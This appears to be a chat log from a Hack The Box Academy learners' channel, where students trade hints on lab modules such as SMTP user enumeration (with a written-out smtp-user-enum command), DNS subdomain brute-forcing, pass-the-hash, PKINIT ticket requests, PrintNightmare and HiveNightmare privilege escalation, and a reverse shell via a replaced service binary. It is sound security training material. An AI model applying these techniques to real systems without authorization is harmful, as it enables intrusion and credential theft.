I see thank you however what do I need to do to get my \n to be valid... I tried encoding it but still invalid

it's just the word

whats %5Cn? that's not what the new-line character is

😉

I used cyberchef and did a url encode on it

Cyberchef is taking the literal string of \n

so it's treating it as 2 characters, not a single control

ohhh I see

thank you very much

see: other injection operators section, in the table there "header injection"

|| dnsenum || ? cause if it's that, it's really really long

It just failed ..

it really doesn't take that long, and as I said you're going to need a different wordlist to find the answer; my other hint is less direct about "start small go big" as in start with smaller wordlists then go bigger

it won't fail for every subdomain

I'm trying with the basic domain, just to understand how it works first, and it failed, i'm trying an other wordlist rn

the basic syntax; the example uses inlanefreight.htb at the end, but you can do subdomain.inlanefreight.htb and it will enumerate the subdomain using the dnsserver specified by the --dnsserver flag

okok mb, i missed a letter at the end, i'll try again

i felt that in my core

fck

but now it's really really long x)

patience is a key thing to have in this field

I'm patient but it start to be really really long x)

Ok after a long way, i'm under the sunset 🙂

I need to say this: the Environment Enumeration lab in the Linux PrivEsc module is incredibly frustrating and poorly designed.

The section provides zero clues on how to actually find the flag using the methodology taught. None of the commands explained (OS/Kernel version, PATH, etc.) lead you to the solution in a logical way. It feels absurd that the only way to find it is by 'guessing' the flag format and grepping the whole system, or finding an exploit that isn't even mentioned in the text or discoverable via sudo -l (since it requires a password).

It’s a poor design for a learning module because it forces you to look for spoilers instead of practicing the enumeration steps you just read. The real exploit exists, but it shouldn't be the focus of an 'Enumeration' section if the text doesn't teach you how to find it first. Has anyone actually solved this using ONLY the methodology provided in the text?

@autumn pilot can i dm you for the rundll32 windows evasion module?

Can I DM someone to get a hint for the Skills Assessment - File Inclusion?

sure

Hey guys, in the SMTP course in the FootPrinting Module, can someone juste tell me if i'm the good way cause i'm trying to use wordlists but it's very very long on the HTB's machine, and i don't have the commande on my personal terminal. And, the command isn't even present in the course cause footprinting is a really small part in this course so i don't know if i'm on the good way.
For information, i started my first "small" wordlist at 31... that why i don't want to try 10 wordlists if it's more than 10m each

Thx

Spoil of my command, don't look it if you're starting the course ( event if it's possible that it's not the good commande at all 🙂 ) ||smtp-user-enum -M RCPT -U /usr/share/wordlists/seclists/Usernames/Names/names.txt -t 10.129.26.6||

There's a wordlist shared in the Footprinting module, it might be worth a try

Theres a wordlist provided by the module look for a button labeled <resources>

Yeah i saw it, but i didn't find it

Also dont use rcpt

VRFY is better

just, how could i find the wordlist, i have the name, it is in the hint

?

No it's ok i download it

May someone now how to install smtp-enum-user ?

Cause it's toooo loonggg on the HTB machine

It should already be installed on Kali by default. You can check here for more info: https://www.kali.org/tools/smtp-user-enum/

Output : 0 result

With the wordlist download in the button ressources

sometimes you need to adjust the wait time; SMTP can be very slow, i always mix up if it's -w or -W for wait time

-w n Wait a maximum of n seconds for reply (default: 5)

options are :
-t n Wait a maximum of n seconds for reply (default: 5)

I don't understand cause -t is suppose to be an arg for an ip ?

it srsly doesn't work

it's horrible ..

Are you sure you're still connected to the VPN? Since you switched from the Pwnbox to your own machine, you need the OpenVPN connection active to reach the target

Yeah i pinged

Can you share your enum command?

smtp-user-enum -M VRFY -U Téléchargements/footprinting-wordlist.txt -w 30 -t 10.129.26.18

Now i'm on the HTB's Machine, just run that

it will take a while

cause on my machine i've that :

Remember that some SMTP servers have higher response times

So if -w 30 is not working, maybe try -w 60 or more

hi everyone, how hard is cpts exam

Also, if smtp-user-enum continues to give you 0 results, remember that there are other ways to enumerate SMTP users. Even if you haven't covered them in the module, you know that Nmap has scripts, or you can try an appropriate Metasploit module. Sometimes one tool fails where another succeeds due to how they handle timeouts or specific server responses.

Still no idea how to solve the server problem, please help someone

P.S. If anyone has completed the AI Privacy module, please DM me

Between 15-25 seconds has been the most reliable, note that its the timeout so if it receives a response before that, it wont wait the full time

Hi everyone! Can anyone help with the Password Attack - Pass the Hash - question 4? Why is it that when I connect via RDP as Administrator and then use David’s hash in Mimikatz for PtH, I can access David’s shared folder, but when I connect via RDP directly using David’s hash, the share is not accessible?

Also, why does the whoami command still show Administrator even though I performed Pass-the-Hash (PtH) for David?

Hello guys am stuck in this nmap hard lab for the past 3 days can someone help me

Try a different endpoint.

supplier? no hit

Check the paragraph before the Prevention paragraph in the section content. Should get you pointed in the right direction.

anyone experienced in cookie hijacking, cuz need help

Hi guys, I am on module/143/section/1484. I am trying to request a TGT using gettgtpkinit.py followind the examples, but I am getting

Requesting TGT
INFO:minikerberos:Requesting TGT
Traceback (most recent call last):
  File "/opt/PKINITtools/gettgtpkinit.py", line 349, in <module>
    main()
  File "/opt/PKINITtools/gettgtpkinit.py", line 345, in main
    amain(args)
  File "/opt/PKINITtools/gettgtpkinit.py", line 315, in amain
    res = sock.sendrecv(req)
  File "/usr/local/lib/python3.9/dist-packages/minikerberos-0.2.20-py3.9.egg/minikerberos/network/clientsocket.py", line 87, in sendrecv
minikerberos.protocol.errors.KerberosError:  Error Name: KDC_ERR_PADATA_TYPE_NOSUPP Detail: "KDC has no support for PADATA type (pre-authentication data)"

the lab should be configured to make it possible, anyone else getting this?

found the answer in #1234357888114364508

Hi I have a question, regarding ExtraSids attack is it required to use the SID of enterprise admin group to compromise the parent domain or is it for root domain like can I use domain admin SID if it's not the root domain just a parent domain

I can help u if u want

what wordlist did you use for this ? i tried these , though they dont have randomness

   5-digits-00000-99999.txt 
   6-digits-000000-999999.txt 

@unique rune I sent u a private message if u need me for the Nmap Hard Lab

I'd start with the smallest.

And you triggered it with the correct endpoint? I'm going to have to remove some of these posts as it's Tier 2 material. You can DM me.

yes, unless cleanup script, cause i've been bruteforcing for a minute now

more than 5 min

You can send a DM.

thanks, will do, in a hour or so... i'm about to commute home

Someone DM'd me for help and I pressed the ignore button by mistake, sorry

ok. So in the WIndows Privesc module, working on kernel exploits, and so far I cannot get any of the examples to work. PrintNightmare allowed me to create a new user, and I can see it's got Administrator privilege when I run net user, but I can't switch to it.

and then I was able to run the hivenightmare to pull back the SAM hashes, but it says that the files are saved to c:\windows\temp but I don't have permission to access that folder.

finally, I was not able to get the maintenanceservice.exe reverse shell to work. I have all the configs properly on the malicious file, I was able to replace the mozilla service file, but then the reverse shell won't connect.

Hey all. I'm working through Attacking Common Applications - Web Vuln with Thick-Client. I'm trying to understand where the 10.10.10.74 IP comes from? When I try to log into the fatty client and monitor the traffic with Wireshark, I'm not getting that IP anywhere, unless I'm doing something wrong.

Hello, I'm having trouble with the SQL Injection Fundamentals Skills Assessment part. I've tried looking up some tutorials of it, but they seem to be outdated as they are not using the same login page to exploit. If anyone can point me in the right direction I would appreciate it.

it is thick

you can not do anything about it

You can dm if you want

sooo, the trouble was about Double Hop Problem and in new version of mimikatz it can receive TGT

In the enumerating password policies section of the AD module this section says minimum password length when domain is created is 7. Where are they getting this number from? The enum4linux output says minimum password length is 8 and doesn’t mention about the default length when domain is created.

I got it, chained those command and done... thanks

iirc you are supposed to answer the question from the section output

but they actually didn't mention it anywhere i think

OK, what do I do. I'm absolutely getting nowhere with 'Attacking Common Applications -> Exploiting Web Vulnerabilities in Thick-Client Applications'

this the skills assessment of sql injection intro is there something i did wrong or is there a problem with HTB?

either the thing doesn't run, the modifications aren't doing what they're intended to. There's no explanation as to why or what we're doing so I have no idea how to debug it or otherwise help myself out of this mess. What should I do?

I thought I could just 'muscle through it' but this is getting worse and worse.

are you using the burpsuite chrome or the locally installed chrome?

no

that... wasn't really a yes or no question...

this is the normal output i get

the answer is neither

https://tenor.com/view/uh-what-gif-25782225

this is microsoft edge with no burpsuite

OK, I don't know. I thought I could help with that one and I cannot. I'm sorry.

thats sad i am going to do another module till then

you should do that too

go take an easier one like a break

Looks like that might be the play for both of us.

yes

like why does HTB SHOVE parrot OS down our throat around every corner like most of us have kali

I feel like I need a 4-year degree in computer science with a Java specialty to fully understand the Attacking Common Application 'Exploiting Web Vulnerabilities in Thick-Client Applications'. I even watched the IppSec video for 'fatty'. My background is heavy on network/servers and not much in programming, so not sure if there are any other supplemental resources, especially if there is a lot of programming in the cpts exam.

I have some background in java programming but this is very different from that.

y'all are making me scared of whats to come in my HTB journey 😨

no. This situation is an outlier. This is not normal.

99% of HTB content is waaay better than this.

hmm well i think i am going to put learn javascript and java on my todo list

just know that Java and javascript are different.

javascript takes many syntactic inspirations from java, but beyond that, they're really not related.

yes hence the "and"

I only point it out because many people I've come across don't understand that.

But, yes, understanding both of those languages would be a major benefit.

Also, if you've got the motivation; The C Programming language. So many languages build off of its principles that it is very much in your interest to have an undestanding of that one.

Especially for lower level exploitation techniques such as buffer overflows and the like.

thanks i knew that i needed to understand assembly for reverse engineering but this is the first time i hear of C

Hello everyone, currently doing file transfers module and the question is:
Upload the attached file named upload_win.zip to the target using the method of your choice. Once uploaded, unzip the archive, and run "hasher upload_win.txt" from the command line. Submit the generated hash as your answer.
I've RDPed into the Windows target and run the commands i attached to this message, but i manage to transfer the file but not actually get the hash the module wants...
May anyone help?

easy you dont seem to have read privileges to that file

How do i set them? I'm real bad with windows lol

icacls "path here" /grant YOURUSERHERE:R

i need to study windows tbh

me too, i'm really comfortable with linux but i hate windows

thx btw i'm trying rn

btw this is cmd

it seems u are running on powershell for it to be as close as possible to linux correct?

Hi guys, does anyone have resources to RDP through kerberos with xfreerdp? Tried this one but doesn't work for me: https://www.redteaming.org/rdpkerberos.html

yeah i feel more at home

did it work? the command i gave or did it error out?